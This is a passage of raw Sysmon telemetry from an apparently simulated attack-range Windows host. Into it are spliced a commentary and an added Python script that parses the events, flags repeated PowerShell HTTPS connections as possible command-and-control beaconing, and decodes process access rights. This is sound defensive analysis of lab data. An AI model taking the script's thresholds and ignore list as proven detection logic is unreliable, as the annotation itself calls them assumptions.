Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.155{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.706{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=699FD1C014D0C4ED7072B5F614B4AF38,SHA256=1E17BBDEFD925BD4AA3381A8B40B051A05AE57C0A7E5463B05872B8193C2FAE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036496843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:55.490{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50463-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=860A1C50849D3838B601B34C994791A5,SHA256=887887ACDA7E1F73351E0DDED7B0DE1B5BD955935223B3DAF1B2796C13606B0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F7CBEAC9A14A91AE08178B328A45D6E4,SHA256=BED37D9C73B379216BB1A776B3315013C0329A6BA85F19569FEDC6D80AA593C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:25.038{B81B27B7-A030-6140-6A56-04000000C801}57766180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:26.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E99914B609FAF32F4D91EDF42C37480C,SHA256=10E7A1C0B74F25717C5E81063D30743BCD619DAF8146C46F556E28EA9250E614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:27.716{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C63111A38584AB50792CBFDC8C54754,SHA256=4354B3CBE854DD78A005880086D0E9D9DB04F7262CC581560423EB6ACBE29860,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:28.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7351AD69B165AEFF9CB034D8854F2A3,SHA256=E03F70EF39DE9193B554FDB8B15915E0C195CF7E7DA7A057330CE242D7A3E71E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:57.834{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50464-false10.0.1.12-8000- 23542300x800000000000000036496849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:29.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D974AFC5F512221AE677BB213CD4256A,SHA256=BDAF51A570EB76F118297B904742F94BB9462127ABEEC2207A4CB2BB84F6F1CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:30.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=807B2E24DBE0D51F3092C1397BCBC72A,SHA256=BB6D798CB8D40317CE666329FDCC6B5415AD5DF0F81C5875663E03FF3F40649E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:30.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F71C3190126DE386F69304F86B664C76,SHA256=C279B0E9E784EBD2387D6C79305C65388CA1D785303866194B9749A063F904B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036496853Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:31.843{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4059C124D823134D455C57E2371F242E,SHA256=1BBAE5BEA78D9C8EE7B87DEA1E1164D41DFB28CF917B11DA3D2D535364CDF989,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:01.496{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50465-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496855Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:32.891{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBC44611528B9A0A93A7526112C90C1E,SHA256=723A3CBA7CD9EB723BE0039970D7248EF5093A8EFEDDBA9FB74E626FA83B7876,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496854Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:32.458{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
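The records on this page are Sysmon EventData values with the XML delimiters lost, so each event reads as its fields run together in schema order. Event 10 (ProcessAccess) is RuleName, UtcTime, SourceProcessGUID, SourceProcessId, SourceThreadId, SourceImage, TargetProcessGUID, TargetProcessId, TargetImage, GrantedAccess, CallTrace; event 3 (NetworkConnect) is RuleName, UtcTime, ProcessGuid, ProcessId, Image, User, Protocol, Initiated, SourceIsIpv6, SourceIp, SourceHostname, SourcePort, SourcePortName, DestinationIsIpv6, DestinationIp, DestinationHostname, DestinationPort, DestinationPortName; event 23 (FileDelete) is RuleName, UtcTime, ProcessGuid, ProcessId, User, Image, TargetFilename, Hashes, IsExecutable, Archived; event 1 (ProcessCreate) is RuleName, UtcTime, ProcessGuid, ProcessId, Image, FileVersion, Description, Product, Company, OriginalFileName, CommandLine, CurrentDirectory, User, LogonGuid, LogonId, TerminalSessionId, IntegrityLevel, Hashes, ParentProcessGuid, ParentProcessId, ParentImage, ParentCommandLine (the run of dashes after splunk-powershell.exe is five empty version fields). Read that way, three things on this page deserve a second look: powershell.exe (PID 6940, ATTACKRANGE\REED_SCHMIDT) opens a tcp connection to 10.0.1.16:443 at 13:14:55.490, 13:15:01.496 and 13:15:06.499 (records 36496843, 36496852, 36496862), a cadence worth testing for beaconing; the 0x1fffff (PROCESS_ALL_ACCESS) opens of each new splunk-*.exe by splunkd.exe, csrss.exe and conhost.exe are the handles a parent, the Win32 subsystem and the console host obtain at process creation, while sysmon64.exe opens svchost.exe with only 0x1400 (query rights); and every event 23 ends in IsExecutable=false, Archived="false - insufficient disk space", meaning the deleted files' content was not copied into Sysmon's archive directory and only the recorded hashes remain.

The following is an added example, not code from the original log, from Splunk or from Sysmon. It rebuilds a few of these events as the Sysmon XML they came from (values constructed to mirror the page: hostname, PIDs, timestamps, record IDs), parses them, and runs the three checks described: interval regularity per flow for event 3, expansion of the GrantedAccess mask for event 10, and a list of unarchived deletes for event 23. The ignore list of 10.0.1.12 (the Splunk server the forwarder talks to on this page) is an assumption about what counts as known infrastructure.

```python
"""Decode Sysmon events of the kinds in the dump on this page (event IDs 3, 10, 23).
Added example; not code from the original log, Splunk or Sysmon. The XML is constructed
to mirror values visible on the page; <Data Name="..."> names follow the Sysmon schema.
"""
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SPLUNKD = r"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"
SPLUNK_PS = r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
USER = r"ATTACKRANGE\REED_SCHMIDT"
# PROCESS_* access bits from winnt.h; 0x1fffff is PROCESS_ALL_ACCESS on Vista and later.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE",
}

def _event(eid, record_id, **data):
    """Serialise one Sysmon-style <Event>; every value passed in is a constructed sample."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{eid}</EventID>'
            f"<EventRecordID>{record_id}</EventRecordID>"
            "<Computer>win-host-987.attackrange.local</Computer></System>"
            f"<EventData>{fields}</EventData></Event>")

def _conn(record_id, utc, sport, image=PS, user=USER, dst="10.0.1.16", dport=443):
    return _event(3, record_id, UtcTime=utc, Image=image, User=user, Protocol="tcp",
                  Initiated="true", SourceIp="10.0.1.15", SourcePort=sport,
                  DestinationIp=dst, DestinationPort=dport)

SAMPLE_XML = "\n".join([
    # powershell.exe to 10.0.1.16:443 three times, 5-6 s apart, as on the page.
    _conn(36496843, "2021-09-14 13:14:55.490", 50463),
    _conn(36496852, "2021-09-14 13:15:01.496", 50465),
    _conn(36496862, "2021-09-14 13:15:06.499", 50468),
    # The forwarder's management connection: a single event, not a series.
    _conn(36496857, "2021-09-14 13:15:04.124", 50467, SPLUNKD, r"NT AUTHORITY\SYSTEM",
          "10.0.1.12", 8089),
    _event(10, 36496832, UtcTime="2021-09-14 13:14:24.870", SourceImage=SPLUNKD,
           TargetImage=SPLUNK_PS, GrantedAccess="0x1fffff"),
    _event(10, 36496837, UtcTime="2021-09-14 13:14:24.870", SourceImage=r"C:\Windows\sysmon64.exe",
           TargetImage=r"C:\Windows\system32\svchost.exe", GrantedAccess="0x1400"),
    _event(23, 36496854, UtcTime="2021-09-14 13:14:32.458", Image=SPLUNKD,
           TargetFilename=r"C:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml",
           IsExecutable="false", Archived="false - insufficient disk space"),
])

def parse_events(xml_text):
    """One dict per <Event>: EventID, EventRecordID and every EventData field by name."""
    events = []
    for line in xml_text.splitlines():
        root = ET.fromstring(line)
        ev = {"EventID": int(root.findtext("e:System/e:EventID", namespaces=NS)),
              "EventRecordID": int(root.findtext("e:System/e:EventRecordID", namespaces=NS))}
        for d in root.findall("e:EventData/e:Data", NS):
            ev[d.get("Name")] = d.text or ""
        events.append(ev)
    return events

def decode_granted_access(mask):
    """Expand an EID 10 GrantedAccess value such as '0x1400' into named rights."""
    value = int(mask, 16)
    if value & 0x1FFFFF == 0x1FFFFF:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if value & bit]

def beacon_candidates(events, min_connections=3, max_cv=0.25, ignore_dst=frozenset({"10.0.1.12"})):
    """Flag (Image, User, DestinationIp, DestinationPort) flows whose EID 3 connections recur
    at a steady interval (coefficient of variation <= max_cv). ignore_dst defaults to the
    Splunk server on the page; treating it as known infrastructure is an assumption."""
    by_flow = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 3 and ev["DestinationIp"] not in ignore_dst:
            key = (ev["Image"], ev["User"], ev["DestinationIp"], ev["DestinationPort"])
            by_flow[key].append(datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f"))
    hits = {}
    for key, times in by_flow.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_cv:
            hits[key] = mean(gaps)  # mean interval in seconds
    return hits

def unarchived_deletes(events):
    """EID 23 records whose Archived field is not 'true': the deleted content was not kept
    in Sysmon's archive directory, so only the recorded hashes remain for forensics."""
    return [(ev["EventRecordID"], ev["TargetFilename"], ev["Archived"])
            for ev in events if ev["EventID"] == 23 and not ev["Archived"].startswith("true")]

if __name__ == "__main__":
    evs = parse_events(SAMPLE_XML)
    for flow, interval in beacon_candidates(evs).items():
        print(f"beacon candidate {flow} every {interval:.3f}s")
    for ev in evs:
        if ev["EventID"] == 10:
            print(ev["SourceImage"], "->", ev["TargetImage"], decode_granted_access(ev["GrantedAccess"]))
    print(unarchived_deletes(evs))
```

On the constructed sample the powershell.exe flow is the only beacon candidate (three connections, mean gap about 5.5 s, coefficient of variation about 0.09); the single splunkd.exe connection never reaches min_connections and is on the ignore list anyway. The cadence test alone is not evidence: the forwarder's own streamfwd.exe connections to 10.0.1.12:8000 on this page also recur a few seconds apart, which is why the flow key carries Image and User and why known destinations are excluded before the interval statistics are computed. Swapping in real events means exporting them as XML (for example with wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml, one Event per line) and passing that text to parse_events.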
23542300x800000000000000036496858Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:33.898{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D86352B076442F1FD6720F03EEF2DA9C,SHA256=CCB00EBF7D5487BDAEA6E715C64C35D836B507BD0910725F974983C9E44AA1E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496857Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:04.124{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50467-false10.0.1.12-8089- 354300x800000000000000036496856Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:03.856{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50466-false10.0.1.12-8000- 23542300x800000000000000036496859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:34.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27DB2BE45E114E5E5BD811E1ACEA4D66,SHA256=BDED05E57ECC25D799CC997D06214ACC5192D19493B2AB71B14F61FAA56A9B64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:35.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB7EF208F9F89C1B4936EB6BAC29563,SHA256=2C3919B85417AABBA5549333CD8B3AC5D4B4882C606B8806C886233DFB6295F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:35.847{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=73CE2990BD8EE198DB342AE5BABEB248,SHA256=1E873D2BC05397DE0A8FEA304F263A41421B358C9FF3C24C497B845514F9599A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:36.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BB17CD4DB922441082B8C54272A356,SHA256=C98186AB4F439C1B7826FC39B22174985180174FFF7DA5BC38B4B1915BB0A315,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:06.499{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50468-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.996{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78129B35ACDB566082B4E2532BD01E1,SHA256=D70F1CBC18A7A5B9AD7EC77C66FD4D636DBE8FE9BC9B15B61190E63AF62C6820,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A03D-6140-6B56-04000000C801}6724C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:37.898{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
